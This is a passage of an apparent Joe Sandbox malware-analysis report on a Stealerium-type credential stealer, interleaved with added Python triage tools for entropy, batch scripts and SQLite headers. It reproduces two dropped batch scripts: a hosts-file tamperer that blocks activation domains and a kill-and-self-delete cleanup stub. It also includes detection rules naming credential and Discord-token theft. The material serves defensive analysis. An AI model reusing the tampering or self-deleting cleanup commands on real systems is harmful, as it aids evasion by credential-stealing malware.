                                                                                                                                                                                                                                                          SHA-512:D4BB53AD27248F42BA3622FBD28BFE76EDA7DDEA4E64D30B8B77FE162619FA3405EC382AB9418A1B4C2276A4E04BB2EC0E72C5BEA9D0ED51BCA81AF0DCAE80D2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:@ECHO OFF....ECHO @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@..ECHO @@@@ Intercambios Virtuales @@@@..ECHO @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@..ECHO...ECHO Comprobando permisos de administrador.....OPENFILES >NUL 2>&1..IF %ERRORLEVEL% EQU 0 (.....ECHO Permisos de administrador detectados....ECHO....ECHO Hosts file : %WINDIR%\system32\drivers\etc\hosts...ECHO......SETLOCAL ENABLEDELAYEDEXPANSION.. ....SET BLOCKLINE=127.0.0.1 platform.albumtd.com....ECHO Revisando : !BLOCKLINE!... FIND /C /I "!BLOCKLINE!" "%WINDIR%\system32\drivers\etc\hosts" >NUL 2>NUL... IF !ERRORLEVEL! NEQ 0 (... .ECHO Linea encontrada, agregandola al archivo hosts.... .ECHO !BLOCKLINE!>>%WINDIR%\system32\drivers\etc\hosts... ) ELSE (... .ECHO Linea encontrada.... )........SET BLOCKLINE=127.0.0.1 activation.albumtd.com....ECHO Revisando : !BLOCKLINE!... FIND /C /I "!BLOCKLINE!" "%WINDIR%\system32\drivers\etc\hosts" >NUL 2>NUL... IF !ERRORLEVEL! NEQ 0 (... .ECHO Linea encontrada, agregando
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3747840
                                                                                                                                                                                                                                                          Entropy (8bit):7.975026284621191
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:98304:4kqXf0FlL9nrYAWAZi6sfLxkuahjCOeX9YG9see5GnRyCAm0makxH13:4kSIlLtzWAXAkuujCPX9YG9he5GnQCAo
                                                                                                                                                                                                                                                          MD5:8F39B25AF1B9048E0C7B06256C602B4F
                                                                                                                                                                                                                                                          SHA1:19D39D75643FDA4D84BBCE0E55F68797B04BAB9C
                                                                                                                                                                                                                                                          SHA-256:1E0B820A25BF178C2E20298EEFDC91E005354891D2A8C93BBCF1B1F39BB4C075
                                                                                                                                                                                                                                                          SHA-512:3F55F3CF65849459A9CF5D0CF404BEE26BF59302D627287DF5D8ED46DC41642B48C1AD53AAF53C2A194B6CC88DE800E4099D82468CCAA9DEB2AC1CEB9E0165EF
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: ditekSHen
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0...9.............. ....@...... .......................`9...........`...@......@............... ...............................@9.(...........................,89.............................................................. ..P............text...H.9.. ....9................. ..`.rsrc...(....@9.......9.............@..@........................................H.......pS7.........!....'..L%6..................................................(....*..0..........~....(}........~....(}........~....r...p(....,.*~....r...p~....r...po....(}...o....~....r...p~....r...po....(}...o....~....r...p~....r...po....(}...o....*...0..........r...p.....r+..p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....s....%r...pr6..po....%r...pr6..po....%r...pr6..po................%.r8..p.%.rJ..p.%.rZ..p.%.rd..p.%.r
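The per-file fields above (size, MD5/SHA1/SHA-256, "Entropy (8bit)", file type) are what an analyst re-derives when validating a sandbox report or triaging the same drop offline. The value 7.975 bits/byte on a 3.7 MB .NET assembly is close to the 8.0 ceiling and is consistent with the JoeSecurity_CosturaAssemblyLoader hit: Costura embeds referenced assemblies as compressed resources, so most of the file is DEFLATE output rather than IL. The following Python is an added example, not part of the Joe Sandbox report or of any tool it mentions; the magic-byte table, the 4096-byte size floor and the 7.9 bits/byte threshold are the author's triage heuristics, not a Joe Sandbox definition.

```python
import hashlib
import math
from collections import Counter

# Prefix signatures for the file types that appear in this section of the report.
# Assumption (illustrative): a short prefix match is enough for first-pass triage.
_MAGIC = (
    (b"MZ", "PE executable (DOS stub)"),
    (b"SQLite format 3\x00", "SQLite 3.x database"),
    (b"@ECHO OFF", "DOS batch file"),
    (b"<!DOCTYPE html", "HTML document"),
)


def shannon_entropy(data: bytes) -> float:
    """Byte-wise Shannon entropy in bits per byte, range 0.0 .. 8.0.

    This is the quantity the report prints as "Entropy (8bit)": a file whose
    256 byte values are equally frequent scores 8.0, a constant file scores 0.0.
    """
    if not data:
        return 0.0
    n = len(data)
    counts = Counter(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def guess_type(data: bytes) -> str:
    """Return a coarse type label from the leading bytes, 'data' if unknown."""
    for magic, label in _MAGIC:
        if data.startswith(magic):
            return label
    return "data"


def triage(data: bytes) -> dict:
    """Summarise one dropped file the way the report's per-file block does.

    Hashes are upper-cased to match the report's presentation. The
    'likely_packed_or_encrypted' flag is a heuristic (assumption): above
    about 7.9 bits/byte over a file of at least 4 KiB, the bulk of the content
    is compressed or encrypted rather than ordinary code or text.
    """
    ent = shannon_entropy(data)
    return {
        "size": len(data),
        "type": guess_type(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "entropy": round(ent, 6),
        "likely_packed_or_encrypted": len(data) >= 4096 and ent > 7.9,
    }


if __name__ == "__main__":
    # Constructed inputs: a uniform byte distribution (entropy 8.0) and a
    # repetitive batch file (low entropy). Real use: triage(open(p, "rb").read()).
    for sample in (bytes(range(256)) * 16, b"@ECHO OFF\r\n" * 500):
        print(triage(sample))
```

Run `triage()` over each file in the sandbox's dropped-file archive and diff the hashes against the report before trusting either; a mismatch means you are not looking at the same artifact. A PE that scores above 7.9 is worth unpacking (or, for a .NET assembly with a Costura hit, extracting and inflating its embedded resources) before any static signature work, because YARA rules written for the inner payload will not fire on the compressed outer file.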
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3747840
                                                                                                                                                                                                                                                          Entropy (8bit):7.975026284621191
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:98304:4kqXf0FlL9nrYAWAZi6sfLxkuahjCOeX9YG9see5GnRyCAm0makxH13:4kSIlLtzWAXAkuujCPX9YG9he5GnQCAo
                                                                                                                                                                                                                                                          MD5:8F39B25AF1B9048E0C7B06256C602B4F
                                                                                                                                                                                                                                                          SHA1:19D39D75643FDA4D84BBCE0E55F68797B04BAB9C
                                                                                                                                                                                                                                                          SHA-256:1E0B820A25BF178C2E20298EEFDC91E005354891D2A8C93BBCF1B1F39BB4C075
                                                                                                                                                                                                                                                          SHA-512:3F55F3CF65849459A9CF5D0CF404BEE26BF59302D627287DF5D8ED46DC41642B48C1AD53AAF53C2A194B6CC88DE800E4099D82468CCAA9DEB2AC1CEB9E0165EF
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, Author: ditekSHen
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0...9.............. ....@...... .......................`9...........`...@......@............... ...............................@9.(...........................,89.............................................................. ..P............text...H.9.. ....9................. ..`.rsrc...(....@9.......9.............@..@........................................H.......pS7.........!....'..L%6..................................................(....*..0..........~....(}........~....(}........~....r...p(....,.*~....r...p~....r...po....(}...o....~....r...p~....r...po....(}...o....~....r...p~....r...po....(}...o....*...0..........r...p.....r+..p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....s....%r...pr6..po....%r...pr6..po....%r...pr6..po................%.r8..p.%.rJ..p.%.rZ..p.%.rd..p.%.r
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):778
                                                                                                                                                                                                                                                          Entropy (8bit):7.402840098306193
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:nBKxpIp32eLU4jh8Ml5h8QIwAvJpWTM9LDxszUHMRXaGyUGz24XbuHhoS0BgF:nKY74Ml8nJRt3ciMIG9AbECS0SF
                                                                                                                                                                                                                                                          MD5:B4B9EAC083FAA9144162551DFD4324A0
                                                                                                                                                                                                                                                          SHA1:48460201F52C6AFFAC680A883AE6AE8BDDB40964
                                                                                                                                                                                                                                                          SHA-256:26D7F405429C10035F3ED4DBFC2BD27C9833B8D6F1FCAE5F823212E32B552749
                                                                                                                                                                                                                                                          SHA-512:CAF7D4D9BC61B7FC0A07E31B76E877CEC2FD901C06EC6DBED18AABA745D4062C342A7831C6363D6E81E797AC6480BF1137C51B1702048D2C50DB413034DC0A82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:EA06....Qht.|..F.CaP.P.e@...... .H)6..c..lV.}.AV...[...s..... ........,......b.......r..n`... ..-..u..t.Xl....i..S..Zu..L.....uV. .O...l*.F.Ih.*.>.L....,..Q..&..@....`....X..t....e.\.[...H)..... .Zm.Y..A%..i.JMJK\..nwK-.g2.Y.V....s.Yn.:....@..QS..)..... ..4*e..E.Pk ..b.A.T.4.t6..f........TR.u.{1.M...."c .[,7K5..m.Xm.+...d.X......j.Yn...m:.H@..!. ........K.r.}&A"...A"....@+.....2..H@W.!.S.......@.X.Zm.[...n....+-.Y ...V[8.#l..,6....c.Zn....-..<..);>.... ...AE.T.....V. 2....a..-7k...o..........p...r.......m..e..i...\?......u..p....;...r...o?..0....a..m...@-.x"?.......m.KM..r... ......O..{m..m..M..i.Yn.0......c..m.@./.....r...N..<...v.#..-.@.,X..Y... .Xd.+-..i......-K..~.%..e...h.........a%...o.[.@..N...;M..s.YmV[...a.H...x...e.0$.;...p.H@.x...l*.A...
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                          Size (bytes):152
                                                                                                                                                                                                                                                          Entropy (8bit):5.4334293660082835
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:HFTulK1shFRovRK2STtv/K025Pt+kiE2J5xAIzDwDwcQ87DVAWyn:sgLvE2SZX2Pwkn23fzDwDwhkVwn
                                                                                                                                                                                                                                                          MD5:58B9088A6AB24E5E7221FCEAD9C062DE
                                                                                                                                                                                                                                                          SHA1:9A018ECC6C58B58800AF5EFAC9C799CE619F0232
                                                                                                                                                                                                                                                          SHA-256:DB45EB25A91A56580139799141CF16F18C1FDB30C63A663E7D2C5B441E770DB4
                                                                                                                                                                                                                                                          SHA-512:B0BFAE01C2AF44BF552E10A75FEEF0DC44840540DE56C14533A0D80A0F61CEAA9CFBD4BDD796F60863F226DEBBEE95A0C6EEEEDC77E4C6D46E3ECAE65D4EF4EA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:chcp 65001..taskkill /F /PID 4828..timeout /T 2 /NOBREAK > NUL..del /F /Q "C:\Users\user\AppData\Local\Temp\deec1b5f-97cf-494d-80f2-5e4fb7cf93cd.bat"..
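Two of the dropped batch files in this section are worth pattern-matching rather than reading by hand: the "Intercambios Virtuales" script above appends `127.0.0.1 <domain>` lines to `%WINDIR%\system32\drivers\etc\hosts` (a DNS sinkhole of the listed activation domains, only when run with administrator rights), and the 152-byte file written by JOUNLV.exe kills a process by PID, waits, and deletes its own randomly named `.bat` in `%TEMP%`, the usual shape of a stealer's cleanup stub. The Python below is an added example by the editor, not code from the report or from the sample; both input scripts are reconstructed from the previews shown on this page (trimmed and with CRLF line endings restored), the regular expressions and the "self-delete" rule are the author's heuristics, and `own_path` is an assumed parameter the caller supplies from the file's recorded path.

```python
import re
from typing import Optional

# Constructed from the report's previews: a hosts-file blocker (trimmed to two
# domains) and the kill-then-delete stub. They are test inputs, not the originals.
HOSTS_BLOCKER_BAT = "\r\n".join([
    r'@ECHO OFF',
    r'ECHO Comprobando permisos de administrador...',
    r'OPENFILES >NUL 2>&1',
    r'IF %ERRORLEVEL% EQU 0 (',
    r'  SETLOCAL ENABLEDELAYEDEXPANSION',
    r'  SET BLOCKLINE=127.0.0.1 platform.albumtd.com',
    r'  FIND /C /I "!BLOCKLINE!" "%WINDIR%\system32\drivers\etc\hosts" >NUL 2>NUL',
    r'  IF !ERRORLEVEL! NEQ 0 (',
    r'    ECHO !BLOCKLINE!>>%WINDIR%\system32\drivers\etc\hosts',
    r'  )',
    r'  SET BLOCKLINE=127.0.0.1 activation.albumtd.com',
    r'  FIND /C /I "!BLOCKLINE!" "%WINDIR%\system32\drivers\etc\hosts" >NUL 2>NUL',
    r'  IF !ERRORLEVEL! NEQ 0 (',
    r'    ECHO !BLOCKLINE!>>%WINDIR%\system32\drivers\etc\hosts',
    r'  )',
    r')',
])
SELF_DELETE_PATH = r"C:\Users\user\AppData\Local\Temp\deec1b5f-97cf-494d-80f2-5e4fb7cf93cd.bat"
SELF_DELETE_BAT = "\r\n".join([
    r'chcp 65001',
    r'taskkill /F /PID 4828',
    r'timeout /T 2 /NOBREAK > NUL',
    r'del /F /Q "' + SELF_DELETE_PATH + '"',
])

# Heuristic patterns (assumptions by the author of this example).
HOSTS_PATH_RE = re.compile(r"drivers\\etc\\hosts", re.IGNORECASE)
SET_BLOCKLINE_RE = re.compile(r"SET\s+BLOCKLINE=(\S+)\s+(\S+)", re.IGNORECASE)
TASKKILL_PID_RE = re.compile(r"taskkill\s+(?:/\S+\s+)*?/PID\s+(\d+)", re.IGNORECASE)
DEL_RE = re.compile(r'\bdel\b\s+(?:/\S+\s+)*"?([^"\r\n]+?\.bat)"?', re.IGNORECASE)


def triage_batch(text: str, own_path: Optional[str] = None) -> dict:
    """Extract the behaviours a responder cares about from a dropped .bat.

    own_path: the script's own on-disk path, if known. With it, self-delete is
    an exact match; without it, any deleted .bat is treated as self-delete
    (heuristic). Returns a dict of structured findings plus verdict strings.
    """
    hosts_append = False
    sinkholed, pids, deleted = [], [], []
    for line in text.splitlines():
        if ">>" in line and HOSTS_PATH_RE.search(line):
            hosts_append = True
        m = SET_BLOCKLINE_RE.search(line)
        if m:
            sinkholed.append((m.group(1), m.group(2)))
        m = TASKKILL_PID_RE.search(line)
        if m:
            pids.append(int(m.group(1)))
        m = DEL_RE.search(line)
        if m:
            deleted.append(m.group(1))
    self_delete = any(
        (own_path is not None and p.lower() == own_path.lower())
        or (own_path is None and p.lower().endswith(".bat"))
        for p in deleted
    )
    verdicts = []
    if hosts_append:
        verdicts.append("appends entries to the hosts file (sinkholes %d domain(s))" % len(sinkholed))
    if pids and self_delete:
        verdicts.append("kills PID(s) %s then deletes its own script (cleanup stub)" % pids)
    return {
        "hosts_append": hosts_append,
        "sinkholed": sinkholed,
        "killed_pids": pids,
        "deleted_files": deleted,
        "self_delete": self_delete,
        "verdicts": verdicts,
    }


if __name__ == "__main__":
    print(triage_batch(HOSTS_BLOCKER_BAT))
    print(triage_batch(SELF_DELETE_BAT, own_path=SELF_DELETE_PATH))
```

The sinkholed domain list is the useful output of the first script: it tells you which hosts-file lines to remove on a cleaned machine, and it explains why a host may later fail to reach those names. For the second script, the PID it kills should be matched against the sandbox's process tree (the report attributes the file to JOUNLV.exe), and the `del` target gives the cleanup path; on a live host the script is gone by the time you look, so hunt for it in Prefetch, the 4688/Sysmon process-creation record of `cmd.exe /c <temp>.bat`, or a filesystem journal rather than on disk.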
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):49152
Entropy (8bit):0.8180424350137764
Encrypted:false
SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:349E6EB110E34A08924D92F6B334801D
SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:false
Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):126976
Entropy (8bit):0.47147045728725767
Encrypted:false
SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:false
Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):5242880
Entropy (8bit):0.037963276276857943
Encrypted:false
SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:C0FDF21AE11A6D1FA1201D502614B622
SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:false
Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false
Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):98304
Entropy (8bit):0.08235737944063153
Encrypted:false
SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
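The File Type, Size and Entropy rows above are all derived from the fixed 100-byte header that starts every SQLite 3 file, which is what a responder triaging these dropped databases reads first. As an added example, not part of the Joe Sandbox report or of the sample it describes, the following Python decodes that header according to the public SQLite file-format specification, computes the 8-bit Shannon entropy the Entropy rows report, and flags two things worth checking on a copied browser database: a file in WAL mode (writer version 2, read version 2, as in the 5242880-byte record) that was copied without its -wal companion and may therefore lack the newest rows, and a header page count that does not account for the file's actual size (that same record declares 46 pages of 32768 bytes, i.e. 1507328 bytes, against 5242880 bytes on disk). The two sample headers are constructed to carry the field values of the first record and of the 5242880-byte record, followed by zero padding instead of real pages; the `build_header`, `triage` and `describe` names are this example's own.

```python
# Added example (not from the Joe Sandbox report or the sample it describes):
# decode the 100-byte SQLite 3 header per the public file-format specification
# and compute the 8-bit entropy the report's Entropy rows show.
import math
import struct

SQLITE_MAGIC = b"SQLite format 3\x00"
TEXT_ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def parse_sqlite_header(data: bytes) -> dict:
    """Return the header fields a triage needs; raise if the magic is wrong."""
    if len(data) < 100 or data[:16] != SQLITE_MAGIC:
        raise ValueError("not an SQLite 3 database (bad magic or short header)")
    page_size, write_version, read_version = struct.unpack_from(">HBB", data, 16)
    (change_counter, db_pages, _freelist_trunk, _freelist_count, schema_cookie,
     schema_format, _cache_size, _largest_root, text_enc,
     user_version) = struct.unpack_from(">10I", data, 24)
    version_valid_for, sqlite_version = struct.unpack_from(">II", data, 92)
    return {
        "page_size": 65536 if page_size == 1 else page_size,  # 65536 is stored as 1
        "write_version": write_version,  # 1 = rollback journal, 2 = WAL
        "read_version": read_version,
        "file_change_counter": change_counter,
        "database_pages": db_pages,
        "schema_cookie": schema_cookie,
        "schema_format": schema_format,
        "text_encoding": TEXT_ENCODINGS.get(text_enc, f"unknown({text_enc})"),
        "user_version": user_version,
        "version_valid_for": version_valid_for,
        "sqlite_version": sqlite_version,
    }


def describe(h: dict) -> str:
    """Render the fields in the style of the report's File Type rows."""
    parts = ["SQLite 3.x database"]
    if h["user_version"]:
        parts.append(f"user version {h['user_version']}")
    parts += [f"last written using SQLite version {h['sqlite_version']}",
              f"page size {h['page_size']}"]
    for key, label in (("write_version", "writer"), ("read_version", "read")):
        if h[key] != 1:  # 1 is the legacy default and is left unprinted
            parts.append(f"{label} version {h[key]}")
    parts += [f"file counter {h['file_change_counter']}",
              f"database pages {h['database_pages']}",
              f"cookie {h['schema_cookie']:#x}", f"schema {h['schema_format']}",
              h["text_encoding"], f"version-valid-for {h['version_valid_for']}"]
    return ", ".join(parts)


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 for uniform zero padding)."""
    if not data:
        return 0.0
    entropy = 0.0
    for value in range(256):
        count = data.count(value)
        if count:
            p = count / len(data)
            entropy -= p * math.log2(p)
    return entropy


def triage(data: bytes) -> dict:
    """Header facts worth checking before opening a dropped database."""
    h = parse_sqlite_header(data)
    expected = h["page_size"] * h["database_pages"]
    return {
        "description": describe(h),
        "entropy": shannon_entropy(data),
        "expected_size": expected,
        "actual_size": len(data),
        "size_mismatch": expected != len(data),
        # WAL mode keeps recent commits in a -wal file; the main file alone may be stale.
        "wal_mode": h["write_version"] == 2 or h["read_version"] == 2,
    }


def build_header(*, page_size, sqlite_version, file_counter, db_pages, cookie,
                 user_version=0, write_version=1, read_version=1):
    """Constructed test header: UTF-8, schema 4, version-valid-for = file counter."""
    hdr = bytearray(100)
    hdr[:16] = SQLITE_MAGIC
    struct.pack_into(">HBBBBBB", hdr, 16, 1 if page_size == 65536 else page_size,
                     write_version, read_version, 0, 64, 32, 32)
    struct.pack_into(">10I", hdr, 24, file_counter, db_pages, 0, 0, cookie, 4,
                     0, 0, 1, user_version)
    struct.pack_into(">II", hdr, 92, file_counter, sqlite_version)
    return bytes(hdr)
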